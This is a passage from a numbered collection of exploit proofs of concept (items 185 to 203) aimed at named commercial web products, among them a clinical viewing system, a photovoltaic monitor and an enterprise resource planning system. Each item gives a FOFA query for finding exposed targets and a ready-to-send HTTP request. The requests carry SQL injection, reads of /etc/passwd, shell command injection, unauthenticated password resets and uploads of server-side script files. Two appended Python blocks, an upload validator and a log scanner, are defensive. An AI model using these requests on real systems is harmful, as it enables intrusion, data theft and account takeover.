X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. ESAFENET (亿赛通) electronic document security management system: NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
Note the /js/../ segment in the request path: when hunting for this in logs, match on the raw, un-normalised request line, because the server resolves it to /CDGServer3/NavigationAjax.
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP: UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name query parameter supplies the stored file name (here only the .ashx extension); the request body becomes the handler source.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>

using System;
using System.Web;

// Minimal ASP.NET generic handler; requesting the uploaded .ashx returns "test" if the upload worked.
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian security management system: setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token; its value replaces {{token}} in the next request.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: param is interpreted as Python code (hence the os.system call); this payload writes a marker file under the web root. Recompute Content-Length when replaying; the 84 shown does not match the body.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back to confirm execution.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform: uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.
The filename traverses out of the upload directory into the deployed fe.war, so the JSP is served from the application root.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 (Volans) internet access behaviour management system: send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name field is spliced into a shell command; the semicolons terminate it and run uname -a.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform: password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request sets a new password for the account named in xgh; no session cookie or token accompanies it.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system: Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
Union-based: a vulnerable target returns 12321 (111*111) in the response. The ;.js suffix on the path is part of the PoC; match on it as written.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyundrive) WebDAV command injection
CVE-2024-29640
The sid value URL-decodes to `ls />/www/aaa.txt` (backtick command substitution), so the listing lands in a file under the LuCI web root. The sysauth cookie means an authenticated LuCI session is required.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS: assetsmanager/upload file upload

1. Request the login page to obtain a CSRF token, exchange it (with credentials) for a session cookie, then upload and fetch the file:

GET /auth/login?to=/ HTTP/1.1

Response: 200; the body contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie. The upload is therefore authenticated; the PoC relies on the admin/admin credentials above.
FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

Resulting path: /storage/uploads/tttt.php

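Items 192, 194 and 199 above (and 202 and 203 further down) all succeed because the server stores whatever the client names and declares. The following is an added example, not code from the original article or from any of the listed products: a server-side upload validator in Python that applies the checks which would have stopped those requests, run against the file names and bodies taken from the PoCs plus two constructed image samples. The extension allow-list, size limit, upload root and every name in the block are assumptions for illustration.

```python
"""Server-side checks for multipart uploads (added example; assumptions noted inline)."""
import os
import secrets
from dataclasses import dataclass

# Assumption: the hypothetical application only stores these types.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Anything a web server or servlet container will execute. Checked against
# every dotted component, so "a.jsp.jpg" is rejected as well.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php5", "phtml", "jsp", "jspx", "jsw", "jsv",
    "asp", "aspx", "ashx", "asmx", "cer", "cfm", "cgi", "pl", "sh",
}

# Leading bytes each binary type must start with; the Content-Type header
# is client-controlled and is never consulted for the decision.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

MAX_BYTES = 10 * 1024 * 1024  # assumed limit


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""


def validate_upload(client_filename: str, declared_type: str, data: bytes) -> Verdict:
    """Return whether the upload may be stored and the server-chosen file name."""
    if not data:
        return Verdict(False, "empty body")
    if len(data) > MAX_BYTES:
        return Verdict(False, "body exceeds size limit")

    name = client_filename.replace("\\", "/")
    if "\x00" in name:
        return Verdict(False, "NUL byte in filename")
    if "/" in name:
        # Item 194's "../../../../../jboss/web/fe.war/hello.jsp" stops here.
        # Rejecting (rather than silently taking the basename) keeps the
        # attempt visible in application logs.
        return Verdict(False, "path separator in filename")

    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        # Item 192's ".ashx" has no base name; a bare "file" has no extension.
        return Verdict(False, "missing base name or extension")
    ext = parts[-1]
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        # Items 199 and 203: tttt.php and 11.jsp, whatever Content-Type claims.
        return Verdict(False, f"executable extension in name: {name}")
    if ext not in ALLOWED_EXTENSIONS:
        return Verdict(False, f"extension not allowed: {ext}")

    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        return Verdict(False, f"body does not look like {ext} (client declared {declared_type})")
    if ext == "txt" and data.lstrip().startswith((b"<?php", b"<%")):
        return Verdict(False, "text file carries server-side script markers")

    # The client name is discarded; the stored name is random and server-chosen.
    return Verdict(True, "ok", f"{secrets.token_hex(16)}.{ext}")


def storage_path(upload_root: str, stored_name: str) -> str:
    """Join the stored name to the upload root and prove the result stayed inside it."""
    root = os.path.realpath(upload_root)
    path = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("resolved path escaped the upload root")
    return path


def path_escapes_root(upload_root: str, stored_name: str) -> bool:
    """True when storage_path() would refuse the name (used for self-checks)."""
    try:
        storage_path(upload_root, stored_name)
    except ValueError:
        return True
    return False


def check_page_samples() -> dict:
    """Run the validator over the file names and bodies from the PoCs above."""
    samples = {
        "item192": (".ashx", "application/x-www-form-urlencoded",
                    b'<%@ WebHandler Language="C#" Class="AverageHandler" %>'),
        "item194": ("../../../../../jboss/web/fe.war/hello.jsp", "text/plain",
                    b'<% out.println("hello");%>'),
        "item199": ("tttt.php", "text/php", b'<?php echo "tttt";unlink(__FILE__);?>'),
        "item202": ("1123.txt", "text/plain", b"Hello World!"),
        "item203": ("11.jsp", "image/jpeg", b'<% out.print("hello,eHR");%>'),
        # Constructed: a real PNG header, and a PHP body renamed to .png.
        "png_ok": ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        "png_fake": ("shell.png", "image/png", b'<?php system($_GET["c"]); ?>'),
    }
    return {k: validate_upload(*v) for k, v in samples.items()}


if __name__ == "__main__":
    for key, verdict in check_page_samples().items():
        print(f"{key:9} accepted={verdict.accepted!s:5} {verdict.reason} {verdict.stored_name}")
```

Only item 202's plain-text upload passes; each of the others is refused by a different check, which is the point: name, extension chain, body bytes and the final storage path are verified independently, and the client-supplied name never reaches the filesystem.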
200. SeaCMS (海洋影视管理系统): dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) omnimedia news editing system: binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is spliced straight into the query: the value carries its own where clause and a stacked WAITFOR DELAY.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system: AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Resulting path: /_data/Uploads/1123.txt

203. 红海云 EHR (Redsea): PtFjk file upload
FOFA:body="RedseaPlatform"
The part declares image/jpeg while carrying a .jsp name and a JSP body; neither is checked.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
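To hunt for these requests in web-server access logs, the following is an added example (not part of the original article): a Python scanner whose rules are built from the endpoint paths and payload fragments of items 188 to 203. The log lines embedded at the end are constructed for the example. An access log carries only the request line, so for PoCs whose payload travels in a POST body (190 to 194, 196, 199, 201 to 203) the scanner can match only the endpoint path; body-level detection needs a WAF or application log.

```python
"""Scan access logs for the request signatures of items 188-203 (added example)."""
import re
from urllib.parse import unquote_plus

# (item number, rule name, regex over "method path?query" after decoding and lower-casing)
RULES = [
    (188, "attachment file read", r"^get /attachment\?.*file=(?:/etc/passwd|.*\.\./)"),
    (189, "deleteStudy time-based SQLi", r"/xds/deletestudy\.php\?.*(?:waitfor\s+delay|sleep\()"),
    (190, "poihuoqu endpoint", r"^post /index\.php/admin/userinfo/poihuoqu"),
    (191, "NavigationAjax via unnormalised path", r"/cdgserver3/[^?]*/\.\./navigationajax"),
    (192, "UploadEmailAttr handler name", r"/joinfapp/email/uploademailattr\?.*name=\.(?:ashx|aspx|asmx)"),
    (193, "setSystemTimeAction", r"/master/ajaxactions/setsystemtimeaction\.php"),
    (194, "uploadAttachmentServlet", r"^post /servlet/uploadattachmentservlet"),
    (195, "send_order.cgi operation", r"^post /send_order\.cgi\?parameter=operation"),
    (196, "resetPasswordBySuper", r"^post /cas/userctl/resetpasswordbysuper"),
    (197, "Quotegask_editAction union SQLi", r"/entsoft/quotegask_editaction\.entweb.*union\s+(?:all\s+)?select"),
    (198, "aliyundrive-webdav sid injection", r"/aliyundrive-webdav/query\?.*sid=[^&]*[`$;|]"),
    (199, "assetsmanager upload", r"^post /assetsmanager/upload"),
    (200, "dmku time-based SQLi", r"/dmplayer/dmku/\?.*(?:sleep\(|benchmark\()"),
    (201, "binary.do", r"^post /newsedit/newsplan/task/binary\.do"),
    (202, "AccountEdit.aspx upload", r"^post /user/accountedit\.aspx"),
    (203, "PtFjk upload", r"/redseaplatform/ptfjk\.mob\?method=upload"),
]
COMPILED = [(item, name, re.compile(rx)) for item, name, rx in RULES]

# Apache/nginx "combined" format; only the fields the scanner needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def decode_target(target: str) -> str:
    """Decode twice (PoCs are often double-encoded) and lower-case for matching."""
    return unquote_plus(unquote_plus(target)).lower()


def scan_line(line: str):
    """Return a finding dict for one log line, or None when no rule matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    probe = f"{m['method'].lower()} {decode_target(m['target'])}"
    hits = [(item, name) for item, name, rx in COMPILED if rx.search(probe)]
    if not hits:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "hits": hits}


def scan_log(lines):
    """Scan an iterable of log lines; findings keep the 1-based line number."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        result = scan_line(line)
        if result:
            findings.append({"line_no": line_no, **result})
    return findings


# Constructed sample log: four PoC requests from this section and two benign ones.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2024:10:01:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1324 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2024:10:01:09 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2024:10:02:15 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 12 "-" "curl/8.0"',
    '198.51.100.7 - - [12/May/2024:10:02:40 +0800] "POST /send_order.cgi?parameter=operation HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/May/2024:10:03:01 +0800] "GET /attachment?file=report-2024.pdf HTTP/1.1" 200 88213 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/May/2024:10:03:05 +0800] "GET /js/player/dmplayer/dmku/?ac=list&type=list HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line_no']}: {f['ip']} status={f['status']} -> {f['hits']}")
```

The status code is kept in each finding on purpose: a 200 on a time-based or upload signature is what separates a live target from a scanner probe that bounced off a 404. Decoding twice before matching is what lets the rule for item 198 see the backtick behind %60, and the rule for item 191 deliberately matches the raw /js/../ path rather than the normalised one.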